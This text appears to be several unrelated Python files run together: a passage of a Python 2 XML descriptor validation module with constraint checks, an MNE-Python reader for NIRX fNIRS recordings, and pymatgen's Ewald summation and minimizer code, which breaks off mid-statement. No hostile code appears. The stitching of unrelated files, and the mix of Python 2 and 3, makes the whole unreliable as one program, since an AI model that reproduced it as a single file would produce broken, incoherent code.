= 'legalValues' _nodeDescription = [ (_ItemNode, None), ] def presentation(self): return dict(constraintName = self.__class__.name, values = list(self)) @classmethod def fromData(cls, data): 
obj = cls(name = cls.name) obj.extend([ _ItemNode(name = _ItemNode.name).characters(str(x)) for x in data['values'] ]) return obj class _RegexpNode(xmllib.BaseNode): name = 'regexp' def presentation(self): return dict(constraintName = self.__class__.name, value = self.getText()) @classmethod def fromData(cls, data): return cls(name = cls.name).characters(data['value']) class _LengthNode(xmllib.BaseNode): name = 'length' def presentation(self): return dict(constraintName = self.__class__.name, value = int(self.getText())) @classmethod def fromData(cls, data): return cls(name = cls.name).characters(str(data['value'])) class _ConstraintsNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'constraints' _nodeDescription = [ (_Descriptions, None), (_RangeNode, None), (_LegalValuesNode, None), (_RegexpNode, None), (_LengthNode, None), ] def presentation(self): return [ x.presentation() for x in self if \ not isinstance(x, _Descriptions) ] def getDescriptions(self): res = [x for x in self if isinstance(x, _Descriptions)] if res: return res[0].getDescriptions() return {} @classmethod def fromData(cls, constraints): if not constraints: return None cls._setMapping() # Reverse the mapping rev = dict((y, x) for (x, y) in cls._mapping.items()) node = cls() if isinstance(constraints, dict): # Only one constraint constraints = [ constraints ] for cdict in constraints: constraintName = cdict.get('constraintName') if constraintName not in rev: continue #setattr(node, constraintName, rev[constraintName].fromData(cdict)) node._children.append(rev[constraintName].fromData(cdict)) return node class _FieldNameNode(xmllib.StringNode): name = 'fieldName' class _OperatorNode(xmllib.StringNode): name = 'operator' class _ValueNode(xmllib.StringNode): name = 'value' class _ConditionalNode(_NoCharDataNode): name = 'conditional' _nodeDescription = [ (_FieldNameNode, None), (_OperatorNode, None), (_ValueNode, None), ] @classmethod def fromConditional(cls, conditional): obj = cls(name = cls.name) obj.fieldName = conditional.fieldName obj.operator = conditional.operator obj.value = conditional.value return obj class DataFieldNode(_NoCharDataNode): name = 'field' _nodeDescription = [ (_NameNode, None), (_Descriptions, None), (HelpNode, None), (_TypeNode, None), (_EnumeratedTypeNode, None), (_MultipleNode, None), (_DefaultNode, None), (_ConstraintsNode, None), (_RequiredNode, None), (_AllowFileContent, None), (_HiddenNode, None), (_PasswordNode, None), (_ConditionalNode, None), ] class _DataFieldsNode(_ExtendEnabledMixin, _NoCharDataNode): name = 'dataFields' _nodeDescription = [ (DataFieldNode, None) ] class DescriptorNode(_NoCharDataNode): name = 'descriptor' _nodeDescription = [ (MetadataNode, 'metadata'), (_DataFieldsNode, 'dataFields'), ] class DescriptorDataNode(xmllib.BaseNode): name = 'descriptorData' class _DescriptorDataField(object): __slots__ = [ '_node', '_nodeDescriptor' ] def __init__(self, node, nodeDescriptor, checkConstraints = True): self._node = node self._nodeDescriptor = nodeDescriptor if checkConstraints: self.checkConstraints() def checkConstraints(self): errorList = [] if self._nodeDescriptor.multiple: # Get the node's children as values values = [ x.getText() for x in self._node.iterChildren() if hasattr(x, 'getName') and x.getName() == 'item' ] if self._nodeDescriptor.required and not values: errorList.append("Missing field: '%s'" % self._nodeDescriptor.name) elif isinstance(self._nodeDescriptor.type, list): errorList.extend(_validateEnumeratedValue(values, self._nodeDescriptor.type, 
self._nodeDescriptor.descriptions[None])) else: # It is conceivable that one has a multi-valued field with a # simple type errorList.extend(_validateMultiValue(values, self._nodeDescriptor.type, self._nodeDescriptor.descriptions.get(None), self._nodeDescriptor.constraints)) else: value = self._node.getText() errorList.extend(_validateSingleValue(value, self._nodeDescriptor.type, self._nodeDescriptor.descriptions.get(None), self._nodeDescriptor.constraints)) if errorList: raise errors.ConstraintsValidationError(errorList) def getName(self): return self._node.getName() def getValue(self): vtype = self._nodeDescriptor.type if self._nodeDescriptor.multiple: return [ _cast(x.getText(), vtype) for x in self._node.iterChildren() if x.getName() == 'item' ] return _cast(self._node.getText(), vtype) def getElementTree(self, parent = None): return self._node.getElementTree(parent = parent) def _toStr(val): if isinstance(val, (str, unicode)): return val return str(val) def _cast(val, typeStr): if typeStr == 'int': try: return int(val) except ValueError: raise errors.DataValidationError(val) elif typeStr == 'bool': val = _toStr(val) if val.upper() not in ('TRUE', '1', 'FALSE', '0'): raise errors.DataValidationError(val) return val.upper() in ('TRUE', '1') elif typeStr == 'str': if isinstance(val, unicode): return val try: return str(val).decode('utf-8') except UnicodeDecodeError, e_value: raise errors.DataValidationError('UnicodeDecodeError: %s' % str(e_value)) return val def _validateEnumeratedValue(values, valueType, description): assert(isinstance(valueType, list)) valuesHash = dict((x.key, None) for x in valueType) errorList = [] for value in values: if value in valuesHash: continue errorList.append("'%s': invalid value '%s'" % ( description, value)) return errorList def _validateMultiValue(values, valueType, description, constraints): errorList = [] for value in values: errorList.extend(_validateSingleValue(value, valueType, description, constraints)) return errorList def _validateSingleValue(value, valueType, description, constraints): if isinstance(valueType, list): return _validateEnumeratedValue([value], valueType, description) errorList = [] try: cvalue = _cast(value, valueType) except errors.DataValidationError, e: errorList.append("'%s': invalid value '%s' for type '%s'" % ( description, value, valueType)) return errorList for constraint in constraints: if constraint['constraintName'] == 'legalValues': legalValues = [ _cast(v, valueType) for v in constraint['values'] ] if cvalue not in legalValues: errorList.append("'%s': '%s' is not a legal value" % (description, value)) continue if constraint['constraintName'] == 'range': # Only applies to int if valueType != 'int': continue if 'min' in constraint: minVal = _cast(constraint['min'], valueType) if cvalue < minVal: errorList.append( "'%s': '%s' fails minimum range check '%s'" % (description, value, minVal)) if 'max' in constraint: maxVal = _cast(constraint['max'], valueType) if cvalue > maxVal: errorList.append( "'%s': '%s' fails maximum range check '%s'" % (description, value, maxVal)) continue if constraint['constraintName'] == 'length': # Only applies to str if valueType != 'str': continue if len(cvalue) > int(constraint['value']): errorList.append( "'%s': '%s' fails length check '%s'" % (description, value, constraint['value'])) continue if constraint['constraintName'] == 'regexp': # Only applies to str if valueType != 'str': continue if not re.compile(constraint['value'], re.S).match(cvalue): errorList.append( "'%s': '%s' fails regexp 
check '%s'" % (description, value, constraint['value'])) continue return errorList
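# --------------------------------------------------------------------------
# Illustration only (Python 2, matching the module above, and assuming the
# module's own imports resolve): exercising the constraint helpers with
# made-up data.  The field description and the constraint dictionaries are
# invented; _validateSingleValue is the function defined above.
if __name__ == '__main__':
    demo_constraints = [
        dict(constraintName = 'range', min = 1, max = 10),
        dict(constraintName = 'legalValues', values = [1, 2, 3, 42]),
    ]
    # '42' is a legal value but exceeds the range maximum, so exactly one
    # error string is returned.
    print(_validateSingleValue('42', 'int', 'retry count', demo_constraints))
    # -> ["'retry count': '42' fails maximum range check '10'"]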
# Authors: Robert Luke <mail@robertluke.net> # # License: BSD (3-clause) from configparser import ConfigParser, RawConfigParser import glob as glob import re as re import os.path as op import numpy as np from ..base import BaseRaw from ..constants import FIFF from ..meas_info import create_info, _format_dig_points from ...annotations import Annotations from ...transforms import apply_trans, _get_trans from ...utils import logger, verbose, fill_doc from ...utils import warn @fill_doc def read_raw_nirx(fname, preload=False, verbose=None): """Reader for a NIRX fNIRS recording. This function has only been tested with NIRScout devices. Parameters ---------- fname : str Path to the NIRX data folder or header file. %(preload)s %(verbose)s Returns ------- raw : instance of RawNIRX A Raw object containing NIRX data. See Also -------- mne.io.Raw : Documentation of attribute and methods. """ return RawNIRX(fname, preload, verbose) def _open(fname): return open(fname, 'r', encoding='latin-1') @fill_doc class RawNIRX(BaseRaw): """Raw object from a NIRX fNIRS file. Parameters ---------- fname : str Path to the NIRX data folder or header file. %(preload)s %(verbose)s See Also -------- mne.io.Raw : Documentation of attribute and methods. """ @verbose def __init__(self, fname, preload=False, verbose=None): from ...externals.pymatreader import read_mat from ...coreg import get_mni_fiducials # avoid circular import prob logger.info('Loading %s' % fname) if fname.endswith('.hdr'): fname = op.dirname(op.abspath(fname)) if not op.isdir(fname): raise FileNotFoundError('The path you specified does not exist.') # Check if required files exist and store names for later use files = dict() keys = ('hdr', 'inf', 'set', 'tpl', 'wl1', 'wl2', 'config.txt', 'probeInfo.mat') for key in keys: files[key] = glob.glob('%s/*%s' % (fname, key)) if len(files[key]) != 1: raise RuntimeError('Expect one %s file, got %d' % (key, len(files[key]),)) files[key] = files[key][0] if len(glob.glob('%s/*%s' % (fname, 'dat'))) != 1: warn("A single dat file was expected in the specified path, but " "got %d. This may indicate that the file structure has been " "modified since the measurement was saved." % (len(glob.glob('%s/*%s' % (fname, 'dat'))))) # Read number of rows/samples of wavelength data last_sample = -1 with _open(files['wl1']) as fid: for line in fid: last_sample += 1 # Read header file # The header file isn't compliant with the configparser. So all the # text between comments must be removed before passing to parser with _open(files['hdr']) as f: hdr_str = f.read() hdr_str = re.sub('#.*?#', '', hdr_str, flags=re.DOTALL) hdr = RawConfigParser() hdr.read_string(hdr_str) # Check that the file format version is supported if hdr['GeneralInfo']['NIRStar'] not in ['"15.0"', '"15.2"', '"15.3"']: raise RuntimeError('MNE does not support this NIRStar version' ' (%s)' % (hdr['GeneralInfo']['NIRStar'],)) if "NIRScout" not in hdr['GeneralInfo']['Device']: warn("Only import of data from NIRScout devices have been " "thoroughly tested. You are using a %s device. 
" % hdr['GeneralInfo']['Device']) # Parse required header fields # Extract frequencies of light used by machine fnirs_wavelengths = [int(s) for s in re.findall(r'(\d+)', hdr['ImagingParameters']['Wavelengths'])] # Extract source-detectors sources = np.asarray([int(s) for s in re.findall(r'(\d+)-\d+:\d+', hdr['DataStructure']['S-D-Key'])], int) detectors = np.asarray([int(s) for s in re.findall(r'\d+-(\d+):\d+', hdr['DataStructure']['S-D-Key'])], int) # Determine if short channels are present and on which detectors if 'shortbundles' in hdr['ImagingParameters']: short_det = [int(s) for s in re.findall(r'(\d+)', hdr['ImagingParameters']['ShortDetIndex'])] short_det = np.array(short_det, int) else: short_det = [] # Extract sampling rate samplingrate = float(hdr['ImagingParameters']['SamplingRate']) # Read participant information file inf = ConfigParser(allow_no_value=True) inf.read(files['inf']) inf = inf._sections['Subject Demographics'] # Store subject information from inf file in mne format # Note: NIRX also records "Study Type", "Experiment History", # "Additional Notes", "Contact Information" and this information # is currently discarded subject_info = {} names = inf['name'].split() if len(names) > 0: subject_info['first_name'] = \ inf['name'].split()[0].replace("\"", "") if len(names) > 1: subject_info['last_name'] = \ inf['name'].split()[-1].replace("\"", "") if len(names) > 2: subject_info['middle_name'] = \ inf['name'].split()[-2].replace("\"", "") # subject_info['birthday'] = inf['age'] # TODO: not formatted properly subject_info['sex'] = inf['gender'].replace("\"", "") # Recode values if subject_info['sex'] in {'M', 'Male', '1'}: subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_MALE elif subject_info['sex'] in {'F', 'Female', '2'}: subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_FEMALE else: subject_info['sex'] = FIFF.FIFFV_SUBJ_SEX_UNKNOWN # NIRStar does not record an id, or handedness by default # Read information about probe/montage/optodes # A word on terminology used here: # Sources produce light # Detectors measure light # Sources and detectors are both called optodes # Each source - detector pair produces a channel # Channels are defined as the midpoint between source and detector mat_data = read_mat(files['probeInfo.mat'], uint16_codec=None) requested_channels = mat_data['probeInfo']['probes']['index_c'] src_locs = mat_data['probeInfo']['probes']['coords_s3'] / 100. det_locs = mat_data['probeInfo']['probes']['coords_d3'] / 100. ch_locs = mat_data['probeInfo']['probes']['coords_c3'] / 100. # These are all in MNI coordinates, so let's transform them to # the Neuromag head coordinate frame mri_head_t, _ = _get_trans('fsaverage', 'mri', 'head') src_locs = apply_trans(mri_head_t, src_locs) det_locs = apply_trans(mri_head_t, det_locs) ch_locs = apply_trans(mri_head_t, ch_locs) # Set up digitization dig = get_mni_fiducials('fsaverage', verbose=False) for fid in dig: fid['r'] = apply_trans(mri_head_t, fid['r']) fid['coord_frame'] = FIFF.FIFFV_COORD_HEAD for ii, ch_loc in enumerate(ch_locs, 1): dig.append(dict( kind=FIFF.FIFFV_POINT_EEG, # misnomer but probably okay r=ch_loc, ident=ii, coord_frame=FIFF.FIFFV_COORD_HEAD, )) dig = _format_dig_points(dig) del mri_head_t # Determine requested channel indices # The wl1 and wl2 files include all possible source - detector pairs. # But most of these are not relevant. 
We want to extract only the # subset requested in the probe file req_ind = np.array([], int) for req_idx in range(requested_channels.shape[0]): sd_idx = np.where((sources == requested_channels[req_idx][0]) & (detectors == requested_channels[req_idx][1])) req_ind = np.concatenate((req_ind, sd_idx[0])) req_ind = req_ind.astype(int) # Generate meaningful channel names def prepend(list, str): str += '{0}' list = [str.format(i) for i in list] return(list) snames = prepend(sources[req_ind], 'S') dnames = prepend(detectors[req_ind], '_D') sdnames = [m + str(n) for m, n in zip(snames, dnames)] sd1 = [s + ' ' + str(fnirs_wavelengths[0]) for s in sdnames] sd2 = [s + ' ' + str(fnirs_wavelengths[1]) for s in sdnames] chnames = [val for pair in zip(sd1, sd2) for val in pair] # Create mne structure info = create_info(chnames, samplingrate, ch_types='fnirs_cw_amplitude') info.update(subject_info=subject_info, dig=dig) # Store channel, source, and detector locations # The channel location is stored in the first 3 entries of loc. # The source location is stored in the second 3 entries of loc. # The detector location is stored in the third 3 entries of loc. # NIRx NIRSite uses MNI coordinates. # Also encode the light frequency in the structure. for ch_idx2 in range(requested_channels.shape[0]): # Find source and store location src = int(requested_channels[ch_idx2, 0]) - 1 info['chs'][ch_idx2 * 2]['loc'][3:6] = src_locs[src, :] info['chs'][ch_idx2 * 2 + 1]['loc'][3:6] = src_locs[src, :] # Find detector and store location det = int(requested_channels[ch_idx2, 1]) - 1 info['chs'][ch_idx2 * 2]['loc'][6:9] = det_locs[det, :] info['chs'][ch_idx2 * 2 + 1]['loc'][6:9] = det_locs[det, :] # Store channel location as midpoint between source and detector. midpoint = (src_locs[src, :] + det_locs[det, :]) / 2 info['chs'][ch_idx2 * 2]['loc'][:3] = midpoint info['chs'][ch_idx2 * 2 + 1]['loc'][:3] = midpoint info['chs'][ch_idx2 * 2]['loc'][9] = fnirs_wavelengths[0] info['chs'][ch_idx2 * 2 + 1]['loc'][9] = fnirs_wavelengths[1] # Extract the start/stop numbers for samples in the CSV. In theory the # sample bounds should just be 10 * the number of channels, but some # files have mixed \n and \n\r endings (!) so we can't rely on it, and # instead make a single pass over the entire file at the beginning so # that we know how to seek and read later. bounds = dict() for key in ('wl1', 'wl2'): offset = 0 bounds[key] = [offset] with open(files[key], 'rb') as fid: for line in fid: offset += len(line) bounds[key].append(offset) assert offset == fid.tell() # Extras required for reading data raw_extras = { 'sd_index': req_ind, 'files': files, 'bounds': bounds, } super(RawNIRX, self).__init__( info, preload, filenames=[fname], last_samps=[last_sample], raw_extras=[raw_extras], verbose=verbose) # Read triggers from event file if op.isfile(files['hdr'][:-3] + 'evt'): with _open(files['hdr'][:-3] + 'evt') as fid: t = [re.findall(r'(\d+)', line) for line in fid] onset = np.zeros(len(t), float) duration = np.zeros(len(t), float) description = [''] * len(t) for t_idx in range(len(t)): binary_value = ''.join(t[t_idx][1:])[::-1] trigger_frame = float(t[t_idx][0]) onset[t_idx] = (trigger_frame) * (1.0 / samplingrate) duration[t_idx] = 1.0 # No duration info stored in files description[t_idx] = int(binary_value, 2) * 1. annot = Annotations(onset, duration, description) self.set_annotations(annot) def _read_segment_file(self, data, idx, fi, start, stop, cals, mult): """Read a segment of data from a file. 
The NIRX machine records raw data as two different wavelengths. The returned data interleaves the wavelengths. """ sdindex = self._raw_extras[fi]['sd_index'] wls = [ _read_csv_rows_cols( self._raw_extras[fi]['files'][key], start, stop, sdindex, self._raw_extras[fi]['bounds'][key]).T for key in ('wl1', 'wl2') ] # TODO: Make this more efficient by only indexing above what we need. # For now let's just construct the full data matrix and index. # Interleave wavelength 1 and 2 to match channel names: this_data = np.zeros((len(wls[0]) * 2, stop - start)) this_data[0::2, :] = wls[0] this_data[1::2, :] = wls[1] data[:] = this_data[idx] return data def _read_csv_rows_cols(fname, start, stop, cols, bounds): with open(fname, 'rb') as fid: fid.seek(bounds[start]) data = fid.read(bounds[stop] - bounds[start]).decode('latin-1') x = np.fromstring(data, float, sep=' ') x.shape = (stop - start, -1) x = x[:, cols] return x
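# --------------------------------------------------------------------------
# A brief usage sketch for the reader above (assuming MNE-Python is
# installed); the folder path is a placeholder for a NIRScout recording
# directory containing the .hdr/.wl1/.wl2/probeInfo.mat files listed above.
import mne

raw = mne.io.read_raw_nirx('path/to/nirx_recording', preload=True)
print(raw.info['sfreq'])   # sampling rate parsed from the .hdr file
print(raw.annotations)     # triggers read from the .evt file, if present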
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. from __future__ import division, unicode_literals from math import pi, sqrt, log from datetime import datetime from copy import deepcopy, copy from warnings import warn import bisect import numpy as np from scipy.special import erfc, comb import scipy.constants as constants """ This module provides classes for calculating the ewald sum of a structure. """ __author__ = "Shyue Ping Ong, William Davidson Richard" __copyright__ = "Copyright 2011, The Materials Project" __credits__ = "Christopher Fischer" __version__ = "1.0" __maintainer__ = "Shyue Ping Ong" __email__ = "shyuep@gmail.com" __status__ = "Production" __date__ = "Aug 1 2012" class EwaldSummation(object): """ Calculates the electrostatic energy of a periodic array of charges using the Ewald technique. Ref: http://www.ee.duke.edu/~ayt/ewaldpaper/ewaldpaper.html This matrix can be used to do fast calculations of ewald sums after species removal. E = E_recip + E_real + E_point Atomic units used in the code, then converted to eV. """ # Converts unit of q*q/r into eV CONV_FACT = 1e10 * constants.e / (4 * pi * constants.epsilon_0) def __init__(self, structure, real_space_cut=None, recip_space_cut=None, eta=None, acc_factor=12.0, w=1 / sqrt(2), compute_forces=False): """ Initializes and calculates the Ewald sum. Default convergence parameters have been specified, but you can override them if you wish. Args: structure (Structure): Input structure that must have proper Specie on all sites, i.e. Element with oxidation state. Use Structure.add_oxidation_state... for example. real_space_cut (float): Real space cutoff radius dictating how many terms are used in the real space sum. Defaults to None, which means determine automagically using the formula given in gulp 3.1 documentation. recip_space_cut (float): Reciprocal space cutoff radius. Defaults to None, which means determine automagically using the formula given in gulp 3.1 documentation. eta (float): The screening parameter. Defaults to None, which means determine automatically. acc_factor (float): No. of significant figures each sum is converged to. w (float): Weight parameter, w, has been included that represents the relative computational expense of calculating a term in real and reciprocal space. Default of 0.7 reproduces result similar to GULP 4.2. This has little effect on the total energy, but may influence speed of computation in large systems. Note that this parameter is used only when the cutoffs are set to None. compute_forces (bool): Whether to compute forces. False by default since it is usually not needed. """ self._s = structure self._charged = abs(structure.charge) > 1e-8 self._vol = structure.volume self._compute_forces = compute_forces self._acc_factor = acc_factor # set screening length self._eta = eta if eta \ else (len(structure) * w / (self._vol ** 2)) ** (1 / 3) * pi self._sqrt_eta = sqrt(self._eta) # acc factor used to automatically determine the optimal real and # reciprocal space cutoff radii self._accf = sqrt(log(10 ** acc_factor)) self._rmax = real_space_cut if real_space_cut \ else self._accf / self._sqrt_eta self._gmax = recip_space_cut if recip_space_cut \ else 2 * self._sqrt_eta * self._accf # The next few lines pre-compute certain quantities and store them. # Ewald summation is rather expensive, and these shortcuts are # necessary to obtain several factors of improvement in speedup. 
self._oxi_states = [compute_average_oxidation_state(site) for site in structure] self._coords = np.array(self._s.cart_coords) # Now we call the relevant private methods to calculate the reciprocal # and real space terms. (self._recip, recip_forces) = self._calc_recip() (self._real, self._point, real_point_forces) = \ self._calc_real_and_point() if self._compute_forces: self._forces = recip_forces + real_point_forces # Compute the correction for a charged cell self._charged_cell_energy = - EwaldSummation.CONV_FACT / 2 * np.pi / \ structure.volume / self._eta * structure.charge ** 2 def compute_partial_energy(self, removed_indices): """ Gives total ewald energy for certain sites being removed, i.e. zeroed out. """ total_energy_matrix = self.total_energy_matrix.copy() for i in removed_indices: total_energy_matrix[i, :] = 0 total_energy_matrix[:, i] = 0 return sum(sum(total_energy_matrix)) def compute_sub_structure(self, sub_structure, tol=1e-3): """ Gives total ewald energy for an sub structure in the same lattice. The sub_structure must be a subset of the original structure, with possible different charges. Args: substructure (Structure): Substructure to compute Ewald sum for. tol (float): Tolerance for site matching in fractional coordinates. Returns: Ewald sum of substructure. """ total_energy_matrix = self.total_energy_matrix.copy() def find_match(site): for test_site in sub_structure: frac_diff = abs(np.array(site.frac_coords) - np.array(test_site.frac_coords)) % 1 frac_diff = [abs(a) < tol or abs(a) > 1 - tol for a in frac_diff] if all(frac_diff): return test_site return None matches = [] for i, site in enumerate(self._s): matching_site = find_match(site) if matching_site: new_charge = compute_average_oxidation_state(matching_site) old_charge = self._oxi_states[i] scaling_factor = new_charge / old_charge matches.append(matching_site) else: scaling_factor = 0 total_energy_matrix[i, :] *= scaling_factor total_energy_matrix[:, i] *= scaling_factor if len(matches) != len(sub_structure): output = ["Missing sites."] for site in sub_structure: if site not in matches: output.append("unmatched = {}".format(site)) raise ValueError("\n".join(output)) return sum(sum(total_energy_matrix)) @property def reciprocal_space_energy(self): """ The reciprocal space energy. """ return sum(sum(self._recip)) @property def reciprocal_space_energy_matrix(self): """ The reciprocal space energy matrix. Each matrix element (i, j) corresponds to the interaction energy between site i and site j in reciprocal space. """ return self._recip @property def real_space_energy(self): """ The real space space energy. """ return sum(sum(self._real)) @property def real_space_energy_matrix(self): """ The real space energy matrix. Each matrix element (i, j) corresponds to the interaction energy between site i and site j in real space. """ return self._real @property def point_energy(self): """ The point energy. """ return sum(self._point) @property def point_energy_matrix(self): """ The point space matrix. A diagonal matrix with the point terms for each site in the diagonal elements. """ return self._point @property def total_energy(self): """ The total energy. """ return sum(sum(self._recip)) + sum(sum(self._real)) + sum(self._point) + self._charged_cell_energy @property def total_energy_matrix(self): """ The total energy matrix. Each matrix element (i, j) corresponds to the total interaction energy between site i and site j. 
Note that this does not include the charged-cell energy, which is only important when the simulation cell is not charge balanced. """ totalenergy = self._recip + self._real for i in range(len(self._point)): totalenergy[i, i] += self._point[i] return totalenergy @property def forces(self): """ The forces on each site as a Nx3 matrix. Each row corresponds to a site. """ if not self._compute_forces: raise AttributeError( "Forces are available only if compute_forces is True!") return self._forces def get_site_energy(self, site_index): """Compute the energy for a single site in the structure Args: site_index (int): Index of site ReturnS: (float) - Energy of that site""" if self._charged: warn('Per atom energies for charged structures not supported in EwaldSummation') return np.sum(self._recip[:,site_index]) + np.sum(self._real[:,site_index]) \ + self._point[site_index] def _calc_recip(self): """ Perform the reciprocal space summation. Calculates the quantity E_recip = 1/(2PiV) sum_{G < Gmax} exp(-(G.G/4/eta))/(G.G) S(G)S(-G) where S(G) = sum_{k=1,N} q_k exp(-i G.r_k) S(G)S(-G) = |S(G)|**2 This method is heavily vectorized to utilize numpy's C backend for speed. """ numsites = self._s.num_sites prefactor = 2 * pi / self._vol erecip = np.zeros((numsites, numsites), dtype=np.float) forces = np.zeros((numsites, 3), dtype=np.float) coords = self._coords rcp_latt = self._s.lattice.reciprocal_lattice recip_nn = rcp_latt.get_points_in_sphere([[0, 0, 0]], [0, 0, 0], self._gmax) frac_coords = [fcoords for (fcoords, dist, i) in recip_nn if dist != 0] gs = rcp_latt.get_cartesian_coords(frac_coords) g2s = np.sum(gs ** 2, 1) expvals = np.exp(-g2s / (4 * self._eta)) grs = np.sum(gs[:, None] * coords[None, :], 2) oxistates = np.array(self._oxi_states) # create array where q_2[i,j] is qi * qj qiqj = oxistates[None, :] * oxistates[:, None] # calculate the structure factor sreals = np.sum(oxistates[None, :] * np.cos(grs), 1) simags = np.sum(oxistates[None, :] * np.sin(grs), 1) for g, g2, gr, expval, sreal, simag in zip(gs, g2s, grs, expvals, sreals, simags): # Uses the identity sin(x)+cos(x) = 2**0.5 sin(x + pi/4) m = (gr[None, :] + pi / 4) - gr[:, None] np.sin(m, m) m *= expval / g2 erecip += m if self._compute_forces: pref = 2 * expval / g2 * oxistates factor = prefactor * pref * ( sreal * np.sin(gr) - simag * np.cos(gr)) forces += factor[:, None] * g[None, :] forces *= EwaldSummation.CONV_FACT erecip *= prefactor * EwaldSummation.CONV_FACT * qiqj * 2 ** 0.5 return erecip, forces def _calc_real_and_point(self): """ Determines the self energy -(eta/pi)**(1/2) * sum_{i=1}^{N} q_i**2 """ fcoords = self._s.frac_coords forcepf = 2.0 * self._sqrt_eta / sqrt(pi) coords = self._coords numsites = self._s.num_sites ereal = np.empty((numsites, numsites), dtype=np.float) forces = np.zeros((numsites, 3), dtype=np.float) qs = np.array(self._oxi_states) epoint = - qs ** 2 * sqrt(self._eta / pi) for i in range(numsites): nfcoords, rij, js = self._s.lattice.get_points_in_sphere(fcoords, coords[i], self._rmax, zip_results=False) # remove the rii term inds = rij > 1e-8 js = js[inds] rij = rij[inds] nfcoords = nfcoords[inds] qi = qs[i] qj = qs[js] erfcval = erfc(self._sqrt_eta * rij) new_ereals = erfcval * qi * qj / rij # insert new_ereals for k in range(numsites): ereal[k, i] = np.sum(new_ereals[js == k]) if self._compute_forces: nccoords = self._s.lattice.get_cartesian_coords(nfcoords) fijpf = qj / rij ** 3 * (erfcval + forcepf * rij * np.exp(-self._eta * rij ** 2)) forces[i] += np.sum(np.expand_dims(fijpf, 1) * 
(np.array([coords[i]]) - nccoords) * qi * EwaldSummation.CONV_FACT, axis=0) ereal *= 0.5 * EwaldSummation.CONV_FACT epoint *= EwaldSummation.CONV_FACT return ereal, epoint, forces @property def eta(self): return self._eta def __str__(self): if self._compute_forces: output = ["Real = " + str(self.real_space_energy), "Reciprocal = " + str(self.reciprocal_space_energy), "Point = " + str(self.point_energy), "Total = " + str(self.total_energy), "Forces:\n" + str(self.forces) ] else: output = ["Real = " + str(self.real_space_energy), "Reciprocal = " + str(self.reciprocal_space_energy), "Point = " + str(self.point_energy), "Total = " + str(self.total_energy), "Forces were not computed"] return "\n".join(output) class EwaldMinimizer: """ This class determines the manipulations that will minimize an ewald matrix, given a list of possible manipulations. This class does not perform the manipulations on a structure, but will return the list of manipulations that should be done on one to produce the minimal structure. It returns the manipulations for the n lowest energy orderings. This class should be used to perform fractional species substitution or fractional species removal to produce a new structure. These manipulations create large numbers of candidate structures, and this class can be used to pick out those with the lowest ewald sum. An alternative (possibly more intuitive) interface to this class is the order disordered structure transformation. Author - Will Richards Args: matrix: A matrix of the ewald sum interaction energies. This is stored in the class as a diagonally symmetric array and so self._matrix will not be the same as the input matrix. m_list: list of manipulations. each item is of the form (multiplication fraction, number_of_indices, indices, species) These are sorted such that the first manipulation contains the most permutations. this is actually evaluated last in the recursion since I'm using pop. num_to_return: The minimizer will find the number_returned lowest energy structures. This is likely to return a number of duplicate structures so it may be necessary to overestimate and then remove the duplicates later. (duplicate checking in this process is extremely expensive) """ ALGO_FAST = 0 ALGO_COMPLETE = 1 ALGO_BEST_FIRST = 2 """ ALGO_TIME_LIMIT: Slowly increases the speed (with the cost of decreasing accuracy) as the minimizer runs. Attempts to limit the run time to approximately 30 minutes. """ ALGO_TIME_LIMIT = 3 def __init__(self, matrix, m_list, num_to_return=1, algo=ALGO_FAST): # Setup and checking of inputs self._matrix = copy(matrix) # Make the matrix diagonally symmetric (so matrix[i,:] == matrix[:,j]) for i in range(len(self._matrix)): for j in range(i, len(self._matrix)): value = (self._matrix[i, j] + self._matrix[j, i]) / 2 self._matrix[i, j] = value self._matrix[j, i] = value # sort the m_list based on number of permutations self._m_list = sorted(m_list, key=lambda x: comb(len(x[2]), x[1]), reverse=True) for mlist in self._m_list: if mlist[0] > 1: raise ValueError('multiplication fractions must be <= 1') self._current_minimum = float('inf') self._num_to_return = num_to_return self._algo = algo if algo == EwaldMinimizer.ALGO_COMPLETE: raise NotImplementedError('Complete algo not yet implemented for ' 'EwaldMinimizer') self._output_lists = [] # Tag that the recurse function looks at at each level. If a method # sets this to true it breaks the recursion and stops the search. 
self._finished = False self._start_time = datetime.utcnow() self.minimize_matrix() self._best_m_list = self._output_lists[0][1] self._minimized_sum = self._output_lists[0][0] def minimize_matrix(self): """ This method finds and returns the permutations that produce the lowest ewald sum calls recursive function to iterate through permutations """ if self._algo == EwaldMinimizer.ALGO_FAST or \ self._algo == EwaldMinimizer.ALGO_BEST_FIRST: return self._recurse(self._matrix, self._m_list, set(range(len(self._matrix)))) def add_m_list(self, matrix_sum, m_list): """ This adds an m_list to the output_lists and updates the current minimum if the list is full. """ if self._output_lists is None: self._output_lists = [[matrix_sum, m_list]] else: bisect.insort(self._output_lists, [matrix_sum, m_list]) if self._algo == EwaldMinimizer.ALGO_BEST_FIRST and \ len(self._output_lists) == self._num_to_return: self._finished = True if len(self._output_lists) > self._num_to_return: self._output_lists.pop() if len(self._output_lists) == self._num_to_return: self._current_minimum = self._output_lists[-1][0] def best_case(self, matrix, m_list, indices_left): """ Computes a best case given a matrix and manipulation list. Args: matrix: the current matrix (with some permutations already performed) m_list: [(multiplication fraction, number_of_indices, indices, species)] describing the manipulation indices: Set of indices which haven't had a permutation performed on them. """ m_indices = [] fraction_list = [] for m in m_list: m_indices.extend(m[2]) fraction_list.extend([m[0]] * m[1]) indices = list(indices_left.intersection(m_indices)) interaction_matrix = matrix[indices, :][:, indices] fractions = np.zeros(len(interaction_matrix)) + 1 fractions[:len(fraction_list)] = fraction_list fractions = np.sort(fractions) # Sum associated with each index (disregarding interactions between # indices) sums = 2 * np.sum(matrix[indices], axis=1) sums = np.sort(sums) # Interaction corrections. Can be reduced to (1-x)(1-y) for x,y in # fractions each element in a column gets multiplied by (1-x), and then # the sum of the columns gets multiplied by (1-y) since fractions are # less than 1, there is no effect of one choice on the other step1 = np.sort(interaction_matrix) * (1 - fractions) step2 = np.sort(np.sum(step1, axis=1)) step3 = step2 * (1 - fractions) interaction_correction = np.sum(step3) if self._algo == self.ALGO_TIME_LIMIT: elapsed_time = datetime.utcnow() - self._start_time speedup_parameter = elapsed_time.total_seconds() / 1800 avg_int = np.sum(interaction_matrix, axis=None) avg_frac = np.average(np.outer(1 - fractions, 1 - fractions)) average_correction = avg_int * avg_frac interaction_correction = average_correction * speedup_parameter \ + interaction_correction * (1 - speedup_parameter) best_case = 